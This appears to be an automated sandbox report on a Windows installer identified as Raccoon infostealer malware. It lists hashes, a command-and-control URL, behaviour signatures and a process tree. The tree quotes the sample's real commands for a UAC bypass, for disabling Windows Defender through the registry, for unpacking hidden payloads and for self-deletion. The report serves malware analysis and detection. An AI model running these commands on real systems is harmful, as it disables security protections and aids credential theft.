Resubmissions

12-08-2024 19:23

240812-x3zrzazfqd 10

12-08-2024 19:07

240812-xs25cazbpd 10

11-08-2024 02:13

240811-cntl7azfnl 10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-08-2024 02:13

General

  • Target

    889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe

  • Size

    10.1MB

  • MD5

    889956cee776d41937c39e225d3e72b6

  • SHA1

    cc8d22b6c453deb2ac2826610cb001b3dd0e9771

  • SHA256

    52bd35dbb0a393f952096a135fc0d8bddf2892977e72a547f604d53433addfb5

  • SHA512

    2fde4df02392114a2e2676963d05d2a40c748710de7e30dad3deb1083fa1e991c85ae49520d679905ae21eaaed7f0458f38454ce04ea1d6544576f0ca3934de4

  • SSDEEP

    196608:JAw2q0MYZLUFq6f07RGqOu0GIawyGkFk2uH4Fe4Baw0YzDOD0O7TjQq3IZ:76gFNMFuu0GIawyG714B/yD0OPje

Malware Config

Extracted

Family

raccoon

Botnet

8fe810873f688849dc81def1a46e795c11d65cab

Attributes
  • url4cnc

    https://telete.in/jredmankun

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 21 IoCs
  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • Raccoon Stealer V1 payload 2 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 20 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 13 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:684
    • C:\Users\Admin\AppData\Local\Temp\is-I5S58.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-I5S58.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp" /SL5="$A0066,9875652,804864,C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:3832
      • C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe
        "C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3040
        • C:\Users\Admin\AppData\Local\Temp\is-0I00E.tmp\Adobe.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-0I00E.tmp\Adobe.tmp" /SL5="$3021C,5833262,804864,C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          PID:2120
          • C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe
            "C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            • Modifies system certificate store
            PID:5028
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.uac.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3328
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4816
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:4116
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.wdcloud.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4476
            • C:\Windows\SysWOW64\reg.exe
              reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
              6⤵
              • Modifies Windows Defender Real-time Protection settings
              • System Location Discovery: System Language Discovery
              PID:3928
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2176
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
              6⤵
                PID:2320
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:3500
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                6⤵
                • Modifies Windows Defender Real-time Protection settings
                • System Location Discovery: System Language Discovery
                PID:3580
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                6⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:4220
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                6⤵
                • Modifies Windows Defender Real-time Protection settings
                • System Location Discovery: System Language Discovery
                PID:4084
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                6⤵
                • Modifies Windows Defender Real-time Protection settings
                • System Location Discovery: System Language Discovery
                PID:2872
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                6⤵
                • Modifies Windows Defender Real-time Protection settings
                • System Location Discovery: System Language Discovery
                PID:4352
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1760
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:5052
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1692
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:396
              • C:\Windows\SysWOW64\reg.exe
                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4232
              • C:\Windows\SysWOW64\reg.exe
                reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                6⤵
                • System Location Discovery: System Language Discovery
                PID:1964
              • C:\Windows\SysWOW64\reg.exe
                reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                6⤵
                  PID:1076
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"
                5⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:2432
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\main.bat" "
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:4976
                  • C:\Windows\SysWOW64\mode.com
                    mode 65,10
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:2468
                  • C:\ProgramData\7z.exe
                    7z.exe e file.zip -p___________1903pwd1764pwd14586___________ -oextracted
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3476
                  • C:\ProgramData\7z.exe
                    7z.exe e extracted/file_9.zip -oextracted
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3116
                  • C:\ProgramData\7z.exe
                    7z.exe e extracted/file_8.zip -oextracted
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2340
                  • C:\ProgramData\7z.exe
                    7z.exe e extracted/file_7.zip -oextracted
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:680
                  • C:\ProgramData\7z.exe
                    7z.exe e extracted/file_6.zip -oextracted
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3956
                  • C:\ProgramData\7z.exe
                    7z.exe e extracted/file_5.zip -oextracted
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2988
                  • C:\ProgramData\7z.exe
                    7z.exe e extracted/file_4.zip -oextracted
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3368
                  • C:\ProgramData\7z.exe
                    7z.exe e extracted/file_3.zip -oextracted
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:848
                  • C:\ProgramData\7z.exe
                    7z.exe e extracted/file_2.zip -oextracted
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:2752
                  • C:\ProgramData\7z.exe
                    7z.exe e extracted/file_1.zip -oextracted
                    7⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:2548
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +H "00008.exe"
                    7⤵
                    • Views/modifies file attributes
                    PID:1780
                  • C:\ProgramData\00008.exe
                    "00008.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4372
                    • C:\ProgramData\00008.exe
                      "00008.exe"
                      8⤵
                      • Executes dropped EXE
                      PID:2340
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 184
                        9⤵
                        • Program crash
                        PID:2856
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"
                5⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:2232
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.delete.bat" "
                  6⤵
                    PID:4900
                    • C:\Windows\SysWOW64\PING.EXE
                      ping -n 60 127.1
                      7⤵
                      • System Location Discovery: System Language Discovery
                      • System Network Configuration Discovery: Internet Connection Discovery
                      • Runs ping.exe
                      PID:1992
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.uac.bat" "
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2600
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
                4⤵
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                PID:1224
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
                4⤵
                • System Location Discovery: System Language Discovery
                • Modifies registry class
                PID:2484
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.wdcloud.bat" "
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1076
              • C:\Windows\SysWOW64\reg.exe
                reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1104
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                4⤵
                  PID:2668
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4460
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4612
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  • System Location Discovery: System Language Discovery
                  PID:2468
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  • System Location Discovery: System Language Discovery
                  PID:3196
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  • System Location Discovery: System Language Discovery
                  PID:1248
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  • System Location Discovery: System Language Discovery
                  PID:1700
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  • System Location Discovery: System Language Discovery
                  PID:3116
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4908
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:3484
                • C:\Windows\SysWOW64\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                  4⤵
                    PID:4232
                  • C:\Windows\SysWOW64\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2656
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1364
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:2640
                  • C:\Windows\SysWOW64\reg.exe
                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:5096
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"
                  3⤵
                  • Checks computer location settings
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2172
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\main.bat" "
                    4⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1780
                    • C:\Windows\SysWOW64\mode.com
                      mode 65,10
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4964
                    • C:\ProgramData\7z.exe
                      7z.exe e file.zip -p___________1903pwd1764pwd14586___________ -oextracted
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3120
                    • C:\ProgramData\7z.exe
                      7z.exe e extracted/file_9.zip -oextracted
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4680
                    • C:\ProgramData\7z.exe
                      7z.exe e extracted/file_8.zip -oextracted
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5072
                    • C:\ProgramData\7z.exe
                      7z.exe e extracted/file_7.zip -oextracted
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2288
                    • C:\ProgramData\7z.exe
                      7z.exe e extracted/file_6.zip -oextracted
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4824
                    • C:\ProgramData\7z.exe
                      7z.exe e extracted/file_5.zip -oextracted
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1032
                    • C:\ProgramData\7z.exe
                      7z.exe e extracted/file_4.zip -oextracted
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2508
                    • C:\ProgramData\7z.exe
                      7z.exe e extracted/file_3.zip -oextracted
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4628
                    • C:\ProgramData\7z.exe
                      7z.exe e extracted/file_2.zip -oextracted
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4384
                    • C:\ProgramData\7z.exe
                      7z.exe e extracted/file_1.zip -oextracted
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2812
                    • C:\Windows\SysWOW64\attrib.exe
                      attrib +H "00008.exe"
                      5⤵
                      • Views/modifies file attributes
                      PID:2548
                    • C:\ProgramData\00008.exe
                      "00008.exe"
                      5⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2776
                • C:\Windows\SysWOW64\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"
                  3⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:4116
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\wu10.delete.bat" "
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:432
                    • C:\Windows\SysWOW64\PING.EXE
                      ping -n 60 127.1
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • System Network Configuration Discovery: Internet Connection Discovery
                      • Runs ping.exe
                      PID:1648
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      5⤵
                        PID:4560
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" del 7z.dll"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:848
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2820
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" del 7z.exe"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2812
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:116
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" del main.bat"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2548
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:688
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" del file.bin"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:5016
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        5⤵
                          PID:3832
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" del wu10.run.vbs"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:668
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:4248
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /S /D /c" del wu10.2run.vbs"
                          5⤵
                            PID:3128
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:764
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" del wu10.uac.bat"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:5028
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:3276
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" del wu10.wdcloud.bat"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:2792
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:2756
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /S /D /c" del wu10.delete.bat"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:4736
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2340 -ip 2340
                    1⤵
                      PID:1744

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe

                      Filesize

                      6.2MB

                      MD5

                      f29f5feaf2450576bf14ca53c90d0059

                      SHA1

                      7262f9605fdd224341aa01a3b5912c09171bfcdc

                      SHA256

                      18c282c1f2bbc302d317a2f4037072355910f3c3425f446a8a8692652a175520

                      SHA512

                      14dfa735b3e7fb1572122c43625be1e61b8c28b1c08cacfb7bd55172e8d2b8db6afa07b4e5822bbf90d9a5f34e368fe67b440779a1d0a01b71f5cb897803b25c

                    • C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe

                      Filesize

                      7.3MB

                      MD5

                      de70f0deed893bba56ccb78eafd59606

                      SHA1

                      f351b0c2996a3573d36deab9b6b3961876189f71

                      SHA256

                      b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d

                      SHA512

                      86459d1e7ba8480cf005087450d7dcf969dcd6f6fd228012d7542539ff74d72105a35b3a8d8216e1b44cdee21730a1ddb32d9b5d20073099cb4da5a56c77fc41

                    • C:\ProgramData\00008.exe

                      Filesize

                      984KB

                      MD5

                      cc92a237e2ed80325da78388c4c7b0b3

                      SHA1

                      3697c658be4cd2bce4f4d1d36d8219a5014c80a3

                      SHA256

                      7911bc8187ba92321b56818dc2c0268aec61fe2aa7999008814582759ac9e979

                      SHA512

                      642bcbb7af75e97e7878d585191e6838d82331a1bf08dfb2b8bd59bbb70ba3c6c8101c9bdd6c7b42c1802c9fc62d036e3750b6d468fa4ba30ba8b16842c06433

                    • C:\ProgramData\7z.dll

                      Filesize

                      1.6MB

                      MD5

                      72491c7b87a7c2dd350b727444f13bb4

                      SHA1

                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                      SHA256

                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                      SHA512

                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                    • C:\ProgramData\7z.exe

                      Filesize

                      458KB

                      MD5

                      619f7135621b50fd1900ff24aade1524

                      SHA1

                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                      SHA256

                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                      SHA512

                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                    • C:\ProgramData\extracted\ANTIAV~1.DAT

                      Filesize

                      2.0MB

                      MD5

                      58c762f5547bbd57d32df484c9bfcb3b

                      SHA1

                      226677e96336e2f861926a50f85b9332f59fe92c

                      SHA256

                      2bfb3efbe8a2b0e8cc30f8067dcd6e21c2b870061a1a0c4dc846cfdfdf391aa3

                      SHA512

                      15f130d18d106af8eccaffeb3f419ce3572c76e52bb6176034e3a7f482bfe188ec804cd5c8436fc2af7c4b84a511800a9241775f482365cac94b2a2688cc97e8

                    • C:\ProgramData\extracted\file_1.zip

                      Filesize

                      579KB

                      MD5

                      ff93e0647ab13a7f46e685d7eeaa6edb

                      SHA1

                      d3b12058046096fe7d4cddc65fb7d0f4705de6bf

                      SHA256

                      2f114069184dd06c63364c02609a49dcdbb7491f096e7e72871ed1c650e54543

                      SHA512

                      28b8184d8c981115db95d874734e6035b3a4a20e458c9a032359feeb8eab3308333b66473c7ab3fb7ee1feff3127a1b09fe087922a55d82154fafe50d42602a0

                    • C:\ProgramData\extracted\file_2.zip

                      Filesize

                      579KB

                      MD5

                      e5d0003422e57c82b03e6d4a823bcebd

                      SHA1

                      e10a5260d75da2da611898882da76779db653756

                      SHA256

                      f65df927f983d1193a70b66c1feda0b800c3570fbfb91cbf8ae403f543f21b20

                      SHA512

                      abf5898f43368d48ff3d72a0580a28996d0ebfbb56f65894933b1b50294a0c95e32903f906f342e00369a864dba9fe8faa0bfcb11affe438c167ce7df9d78fac

                    • C:\ProgramData\extracted\file_3.zip

                      Filesize

                      579KB

                      MD5

                      d646610feca90ade80b0eca7203fea4e

                      SHA1

                      24558e5ab22eb956e249031985353c47b9c37815

                      SHA256

                      fe279c5c49dc3c0765e6bd6b7ed3b0dd05339b3c59113a4f5530744321f499bd

                      SHA512

